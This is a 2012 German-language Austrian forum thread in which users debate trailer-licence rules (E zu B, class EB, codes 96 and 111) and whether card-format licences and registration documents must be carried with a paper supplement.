egal, pruefung hin oder her
es ist aber halt jedenfalls so dass fahrlehrer keine anhaengerpraxis haben muessen
warum sollten sie dann besonders hilfreiche tipps geben koennen?

grundsaetzlich waere ich persoenlich halt eher der typ der dann wenn ich fuer meine kombination den E zu B ja garned brauche (!) -wenn ich das beim threadersteller richtig verstanden habe aber halt recht sicher unterwegs sein will, eher ein fahrtechniktrainig beim OEAMTC mit dem auto buchen oder von mir aus so eine spezialkurs fuer gespannfahrer dort und mich ned freiwillig auf a teure fahrpruefung einlasse ...

aber das kann eh jeder halten wie er will ..

lg
g

derfranze
20.09.2012, 18:25
hallo

ja, danke
ich verwechsle die immer

111 ist die 125iger regelung
96 oder 99 wirdf die 4250kg fuer den haenger sein

ist aber beides "verwandt" miteinander

es gelten die selben regeln
- kein arzt
- keine pruefung
- keine getrennte theorie, nur praxis
- keine neuausstellung des FS noetig (nach der novelle)

lg
g

Lieber abo, jetzt fällst mir schon auf!:D:D:D Der FS EB neu umfasst 3 Theoriestunden und 4 Praxisfahrstunden. Der FS muß bei jeder neuen Eintragung neu ausgestellt werden, fgeht ja bei der Scheckkarte garnicht andes.
Der Unterschied zwischen Code 96 und EB ist nur die Prüfung und das Gewicht natürlich. Und die Prüfung kann jederzeit nachgemacht werden. Ein wesentlicher Vorteil ist jetzt, dass z.B. ein Fahranfänger gleich die EB Ausbildung mitmacht, den Code 96 eingetragen bekommt und vielleicht irgendwann die Prüfung nachholt und volle 7 Tonnen bewegen darf.

lg Franz

abo
20.09.2012, 21:03
[COLOR=Blue]Lieber abo, jetzt fällst mir schon auf!
ich fall oefter wem auf
das macht nix
;-)


[COLOR=Blue]
Der FS EB neu umfasst 3 Theoriestunden und 4 Praxisfahrstunden.

alle fahrschuelen bewerben die E zu B ausbildung mit MAXIMAL 4 theorie und 2 fahrstunden (zu 45min), teils mit weniger.
hier zb:
http://www.fahrschule-kagran.at/page_9_2.html
und die kollegen hier im forum berichten teilweise von nochmal deutlich weniger ..


[COLOR=Blue]
Der FS muß bei jeder neuen Eintragung neu ausgestellt werden, geht ja bei der Scheckkarte garnicht andes.

doch, beiblatt aus papier
du musst ja auch den scheckkartenzulassungsschein MIT dem A4-zettel mitfuehren, der scheckkartenfuehrerschein alleine reicht nicht

lg
g

derfranze
20.09.2012, 21:48
Ich hab schon in einem anderen Thread in diesem Forum gepostet, dass der EzB und die neue Klasse EB zweierlei Paar Schuhe sind. Beim EzB widerspreche ich eh nicht. Aber Code 96 und EB gehen Hand in Hand und unterscheiden sich vom EzB.

lg Franz

derfranze
20.09.2012, 21:51
doch, beiblatt aus papier
du musst ja auch den scheckkartenzulassungsschein MIT dem A4-zettel mitfuehren, der scheckkartenfuehrerschein alleine reicht nicht

lg
g[/quote]

Jetzt kenn ich mich wieder nicht aus: Scheckkartenzulassungsschein und Beiblatt oder Scheckkartenführerschein und Beiblatt?

lg Franz

abo
20.09.2012, 22:52
Jetzt kenn ich mich wieder nicht aus: Scheckkartenzulassungsschein und Beiblatt oder Scheckkartenführerschein und Beiblatt?
lg Franz

hallo

der scheckkartenkram ist fuer A und F
generell

die ganzen "amtlichen" scheckkarten werden von der staatsdruckerei erzeugt
egal welche
zu ungefaehr 3000% der kosten die das am freien markt kosten wuerde

sinnlos ist das alles vor allem deshalb weil natuerlich ned alle infos drauf gehen die noetig sind

du bekommst zu jedem scheckkartenzulassungsschein einen anhang in form eines A4 papierls
dieses papierl ist MITZUFÜHREN weil es teil des zulassungsscheines ist
es gibt kaum einen zulassungschein der nicht irgendwas am zusatzzettel stehen hat
und seie es "betrieb nur mit bleifreiem kraftstoff" oder irgendwelche alternative reifendimensionen

beim fuehrerschein ist es ab inkrafttreten der novelle so dass du die "codes", also allfaellig absolvierte 125ccm3 schulungen bzw eben den schulungen fuer das fahren von 4250kg in beliebiger gewichtszusammensetzung im bedarfsfall auf einem kaesezettel mitfuehren kannst wenn du keinen neuen FS loesen willst

damit ersparst dir die kosten
und den zettel kann man zum zulassungsschein dazutun (wenn er aus papier ist) denn man braucht die code-bestaetigung eh nur wenn man mit dem haenger unterwegs ist

lg
g

Flüsterer
21.09.2012, 08:55
hallo

der scheckkartenkram ist fuer A und F
generell

die ganzen "amtlichen" scheckkarten werden von der staatsdruckerei erzeugt
egal welche
zu ungefaehr 3000% der kosten die das am freien markt kosten wuerde

sinnlos ist das alles vor allem deshalb weil natuerlich ned alle infos drauf gehen die noetig sind

du bekommst zu jedem scheckkartenzulassungsschein einen anhang in form eines A4 papierls
dieses papierl ist MITZUFÜHREN weil es teil des zulassungsscheines ist
es gibt kaum einen zulassungschein der nicht irgendwas am zusatzzettel stehen hat
und seie es "betrieb nur mit bleifreiem kraftstoff" oder irgendwelche alternative reifendimensionen

beim fuehrerschein ist es ab inkrafttreten der novelle so dass du die "codes", also allfaellig absolvierte 125ccm3 schulungen bzw eben den schulungen fuer das fahren von 4250kg in beliebiger gewichtszusammensetzung im bedarfsfall auf einem kaesezettel mitfuehren kannst wenn du keinen neuen FS loesen willst

damit ersparst dir die kosten
und den zettel kann man zum zulassungsschein dazutun (wenn er aus papier ist) denn man braucht die code-bestaetigung eh nur wenn man mit dem haenger unterwegs ist

lg
g

...und ausserdem ist die OeSD eine private Gesellschaft...so viel zum Thema freier Markt, da hat sich nur nie einer aufgeregt, die € 18,- die die OeSD für die "Zulassungsbescheinigung Teil 2 im Scheckkartenformat" verlangt, sind einfach weg von der Realität. Hologramm hin und Chip mit dem Datensatz des CoC Papiers her, wer auch immer nereit ist, so viel der OeSD in den Rachen zu werfen, tut mir leid:rolleyes::rolleyes:

westbahnmichi
24.09.2012, 13:59
hallo


du bekommst zu jedem scheckkartenzulassungsschein einen anhang in form eines A4 papierls


lg
g

Hallo

und von wo bekomm ich das???, denn wenn das so ist haben´s bei meinen zulassungsschein die papierln vergessen mit zu schicken.

Flüsterer
24.09.2012, 15:42
Hallo

und von wo bekomm ich das???, denn wenn das so ist haben´s bei meinen zulassungsschein die papierln vergessen mit zu schicken.

Gewisse usätze werden nicht mehr extra ausgedruckt - sonst hätte fast jede Kartew ein Zusatzpapierl bekommen....

abo
24.09.2012, 17:36
Gewisse usätze werden nicht mehr extra ausgedruckt - sonst hätte fast jede Kartew ein Zusatzpapierl bekommen....

hi

was wird denn noch ausgedruckt?
ich hab neulich wieder mal anlaesslich einer zulassung bei der zulassungstelle nachgefragt

die sagt sobald was in den feldern
A13 raeder bereifung
A17 auflagen
A18 behoerdliche eintragungen
A19 anmerkungen
A 20 anlage
oder
A23 vermerke
steht kommt automatisch des beiblattel mit raus

und das ist mitzufuehren

fahrzeuge die in keinem dieser felder einen eintrag haben gibt es fast ned ...

lg
g

abo
24.09.2012, 17:38
...und ausserdem ist die OeSD eine private Gesellschaft...so viel zum Thema freier Markt, da hat sich nur nie einer aufgeregt...

hi

ICH hab mich eh aufgeregt
aber ich reg mich halt ueber alles auf

deshalb halten die des fuer normal ...:(

lg
g